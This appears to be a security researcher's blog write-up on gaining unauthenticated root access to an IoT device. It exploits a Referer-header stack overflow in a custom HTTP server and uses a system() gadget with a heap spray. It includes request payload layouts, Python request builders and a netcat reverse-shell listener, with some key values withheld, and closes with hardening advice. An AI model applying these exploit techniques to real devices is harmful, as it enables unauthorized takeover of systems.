Back when I first read about this thing called “hacking” I thought I’d be spending all my days overflowing NSA buffers with plagiarized shell code and going by some cool hacker name like “1337BadGeR”. Sadly for me, upon entering the actual world, I had to get back in line with reality and learn my dreams of glory were perhaps just dreams, but sometimes those pesky __stack_chk_fail and __stack_chk_guard don’t show up in a binary and I get to have some fun. Of course, stack canaries aren’t the only lines of defense, but we’ll get into that later; a little exposition is required first.

A while ago I was looking at an IoT device to which I had SSH access, allowing me to pull and look at binaries, but no access to the proprietary source code. Generally I find these types of assessments a lot of fun because reverse engineering has always been a hobby of mine and the binaries give me enough information to find things I might miss otherwise. This device was running an HTTP server that I wanted to check out to make sure everything was implemented safely, so I pulled it, fired up Ghidra (thanks NSA), and tossed it in there. Two things were immediately apparent: this was a custom HTTP server written in C and there was no __stack_chk anything in sight. This definitely got my attention; the next natural step here is to look for places to overflow a buffer. Ghidra is great for this since it lets you easily look up calls to popular culprits, such as strcpy.

At this point though, all I could see was a bunch of pointer arithmetic for arguments passed to dangerous functions, so some more work was necessary: I needed to find out how the server was processing and storing HTTP requests to find out which (if any) information I controlled was being used there. This process basically consisted of working backwards from potentially dangerous function calls and reverse engineering the ARM assembly/Ghidra decompiled output. I eventually built up a struct http_request custom Ghidra type that contained all of the parsed information. This all led to discovering the following code (obviously simplified):

char vuln_buf [SIZE];
    ...
strcpy(vuln_buf, req->referer_header);

The first thing I did to verify that this was indeed a stack buffer overflow was the old faithful “set the return address to AAAA”:

GET / HTTP/1.1\r\n
Referer: <PADDING>AAAA\r\n\r\n

Crash trying to execute code at 0x41414141. Nice.
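
For anyone following along, a probe like this is easy to generate. What follows is only a sketch: padding_len stands in for the distance from vuln_buf to the saved return address, which I'm not giving here, and build_probe_request is a name made up for illustration.

```python
def build_probe_request(padding_len: int, marker: bytes = b"AAAA") -> bytes:
    """Build a GET request whose Referer header ends in a recognizable marker.

    padding_len is a placeholder: the real offset from the buffer to the
    saved return address depends on the target binary.
    """
    if padding_len < 0:
        raise ValueError("padding_len must be non-negative")
    # Any filler byte works as long as it is not \x00, \r or \n.
    filler = b"B" * padding_len
    return b"GET / HTTP/1.1\r\nReferer: " + filler + marker + b"\r\n\r\n"
```

If the marker lines up with the saved return address, the crash address is the marker itself, which is where the 0x41414141 comes from.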

This is still partially the real world though, and non-executable stacks and ASLR are defaults that were not disabled in this case. This is where the exploit gets fun. Here are the restrictions:

  1. This is an HTTP server with injection in the headers: \r and \n are special
  2. The stack and heap being marked as non-executable prevents trivial code execution
  3. \x00 stops strcpy
  4. ASLR severely limits building a ROP chain without some sort of bypass (there is another issue with building a ROP chain that I’ll bring up later)

If you think that looks like a bad set of things for the would-be hacker, you’d be right: it is. Bummer. There is one thing to my advantage though: the executable isn’t compiled as a position independent executable. That means that I can get code execution to jump once to an address that doesn’t have a null byte, \n, or \r, and that jump must be to an address in the executable itself, not the libraries it loads. That address will be the same for all distributed versions of the binary since the C code is compiled just once per version and distributed as a binary. This makes any exploit reliable on a different device as long as it is the same version. Given that single jump, I need to get full code execution. Time to go gadget hunting!
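
The byte restrictions are easy to check mechanically. Here is a minimal sketch, assuming a 32-bit little-endian target (typical for ARM Linux, but an assumption on my part here); the helper names are invented for this example.

```python
import struct

# Bytes that cannot appear in the payload: \x00 stops strcpy,
# \r and \n are meaningful to the HTTP header parser.
BAD_BYTES = b"\x00\r\n"

def bad_bytes_in(address: int) -> bytes:
    """Return the forbidden bytes found in a 32-bit little-endian address."""
    packed = struct.pack("<I", address)
    return bytes(b for b in packed if b in BAD_BYTES)

def usable_addresses(candidates):
    """Keep only the candidate addresses that contain no forbidden byte."""
    return [addr for addr in candidates if not bad_bytes_in(addr)]
```

Running candidate gadget addresses through usable_addresses shows right away which ones can be written directly. An address such as 0x00012345 is rejected because its top byte is \x00.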

A quick diversion into why I thought I could keep going at this point: this HTTP server was custom written to provide special functionality for this device alone. Incidentally, this special functionality relied a lot on C’s system and popen functions. My plan of attack here was fairly straightforward: I wanted to jump to a call to system whose arguments were a register I controlled (in this case I controlled pc, r4, and r5). Of course, simple plans never seem to be simple to implement.

One issue that arises during my gadget hunting could potentially make this bug unexploitable: I won’t be able to get a jump address that doesn’t have \x00 in it anywhere (this is a small binary and I can only use addresses in the binary itself reliably), but the Referer header must take the form [^\x00]+\r\n because some earlier processing bugs out on a null byte anywhere in the header. This could have been the nail in the coffin, but there was one saving grace: the code would transform Referer: carvesystems.com\r\n into Referer: carvesystems.com\x00\x00 during header processing. This is actually a clever move on the developers’ part: they don’t have to malloc a new buffer just to hold the Referer header since they already have it in memory. For me though, this means that I can get \x00 into my return address: I’m still in business.
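
To make that transformation concrete, here is a small model of it. This is a sketch of the behavior as I observed it, not the server's actual code: I'm assuming the parser overwrites the first \r\n pair it finds, and both function names are hypothetical.

```python
def terminate_header_in_place(buf: bytearray) -> None:
    """Overwrite the first \\r\\n pair in buf with two NUL bytes (assumed behavior)."""
    end = buf.find(b"\r\n")
    if end == -1:
        raise ValueError("header line has no CRLF terminator")
    buf[end:end + 2] = b"\x00\x00"

def c_string_at(buf: bytes, start: int) -> bytes:
    """Return the bytes a C string function would read starting at start."""
    end = buf.index(b"\x00", start)
    return bytes(buf[start:end])
```

The header never contains a NUL on the wire, yet it is NUL-terminated by the time strcpy reads it, and strcpy copies that terminator along with the data. That terminator is the \x00 that ends up in the return address.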

My original plan was to hopefully find a gadget that did something like this:

add        r0, sp, #xx
bl         system

and with some luck have part of my request living at that point on the stack. These were some high dreams, and I did find a gadget that was a single dereference away (that was a sad moment), but ultimately the binary was not so kind. However, after a bit of searching I found this gem:

00011110 cpy        r0, r5
00011114 bl         system

I control r5, and I can jump to 00011110 by sending 0d011110: the 0d byte is a \r, which header processing turns into the \x00 I need. This might be my gadget, but what could I possibly set r5 to? This is when the fact that we’re dealing with a 32-bit executable becomes helpful: heap spraying is much simpler with 32-bit executables, since the address space is small enough that a large spray has a decent chance of covering a guessed address. Why not try to find a spot I can heap spray and set r5 to something that will most likely be on the heap? There are a few things in the way of this plan:

  1. This server is running on an embedded system and embedded system engineers have religious convictions against using the heap
  2. A vast majority of the endpoints this server handles require authentication

I want unauthenticated RCE, not authenticated: authenticated RCE isn’t what all of the cool kids write blog posts about. I need to hunt through this binary to find a use of malloc that requires no authentication. Well, luckily for me, this happens once: there is a single line of code that will put request data into a buffer created with malloc before checking authentication. Take that, embedded developers, even you might have to use malloc sometimes.

Here is where we stand then:

  1. We can jump a single time
  2. We have a gadget that will put an address we control into r0 before calling system
  3. We can make an unauthenticated request that will put some data we control onto the heap

So we go ahead and spray the heap with a ton of copies of /bin/touch /tmp/haxxed; such that a static “probably the heap” pointer lands in this string. Then we set r5 to “probably the heap” with our overflow and end up with this request:

GET / HTTP/1.1\r\n
Referer: <PADDING><r5 = probably the heap>\x10\x11\x01\r\r\n\r\n
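
Assembling that request can be sketched as follows. The 0d011110 value is the one mentioned earlier, packed little-endian (my assumption about the target's byte order). padding_len and heap_guess are placeholders for values I'm not publishing, and build_exploit_request is an illustrative name.

```python
import struct

# Return address as sent on the wire; the 0x0d byte is a literal \r.
GADGET_AS_SENT = 0x0D011110

def build_exploit_request(padding_len: int, heap_guess: int) -> bytes:
    """Lay out filler, the r5 value and the return address in the Referer header."""
    r5 = struct.pack("<I", heap_guess)
    # The heap pointer is copied by strcpy too, so it has the same byte limits.
    if any(b in b"\x00\r\n" for b in r5):
        raise ValueError("heap pointer contains a byte the parser would mangle")
    pc = struct.pack("<I", GADGET_AS_SENT)  # b"\x10\x11\x01\r"
    filler = b"B" * padding_len
    return b"GET / HTTP/1.1\r\nReferer: " + filler + r5 + pc + b"\r\n\r\n"
```

The check on r5 matters in practice: a "probably the heap" guess has to be picked so that none of its four bytes is \x00, \r, or \n.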

This works because we end up with this huge string:

/bin/touch /tmp/haxxed;/bin/touch /tmp/haxxed;..../bin/touch /tmp/haxxed;

on the heap and the static pointer hopefully lands somewhere in that string like this:

/bin/touch /tmp/haxxed;/bin/touch /tmp/haxxed;..../bin/touch /tmp/haxxed;
       ^-- landing here is still OK

The shell chokes on the truncated first fragment, but every copy after the next ; is intact, so eventually the entire command will be executed.
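
Here is a toy model of why the landing spot doesn't matter much. It only imitates how a shell splits on ; and ignores everything else about the real heap layout; the function names are made up for this sketch.

```python
COMMAND = "/bin/touch /tmp/haxxed;"

def build_spray(copies: int) -> str:
    """Concatenate many copies of the command, each terminated by ';'."""
    return COMMAND * copies

def commands_seen_by_shell(spray: str, landing_offset: int) -> list:
    """Split what system() would receive at landing_offset into shell commands."""
    tail = spray[landing_offset:]
    return [part for part in tail.split(";") if part]

def landing_is_ok(spray: str, landing_offset: int) -> bool:
    """True if at least one intact copy of the command follows the landing point."""
    return COMMAND.rstrip(";") in commands_seen_by_shell(spray, landing_offset)
```

In this model, every offset works except those inside the very last copy, which is why the spray is made large and the pointer is aimed well inside it.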

After a couple of failed attempts and some tweaking of the size of the sprayed area, /tmp/haxxed is sitting there on the target’s filesystem. After developing a more complex command (left as an exercise to the reader), I end up with a reverse shell and am greeted by root access to the device:

$ nc -l -p 3567
id
uid=0(root) gid=0(root) groups=0(root)

Nice.

Takeaways

The point of this post isn’t just that I think this is a clever exploit, but that there is a reason we have so many different protections on binaries. Turning off just a single one of those protections can be catastrophic if you have a dedicated attacker. It is easy to forget why these protections were put into place since they’ve been around so long and you don’t often see stack buffer overflow exploits in modern software, but they have not lost their importance. In this case, the lack of stack cookies and the fact that the executable wasn’t position independent were the two things that allowed me to own the device, even with strict restrictions as well as ASLR and NX in place.
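
If you want a quick first look at your own binaries, the two protections that mattered here can be roughly checked from the ELF file itself. This is a heuristic sketch, not a replacement for a proper audit: it reads e_type from the ELF header (ET_DYN is also used for shared libraries) and does a plain byte search for the __stack_chk_fail symbol name. The function names are my own.

```python
import struct

ET_EXEC, ET_DYN = 2, 3  # e_type values from the ELF specification

def elf_type(data: bytes) -> int:
    """Read e_type from an ELF header, honoring the file's byte order."""
    if len(data) < 18 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # EI_DATA (byte 5): 1 means little-endian, 2 means big-endian.
    endian = "<" if data[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", data, 16)
    return e_type

def audit(data: bytes) -> dict:
    """Rough check for PIE and stack protector references in an ELF image."""
    return {
        "position_independent": elf_type(data) == ET_DYN,
        "stack_protector_symbols": b"__stack_chk_fail" in data,
    }
```

Feeding it the contents of a binary, for example audit(open(path, "rb").read()), gives a first hint. For the server in this post, both values would have come back False.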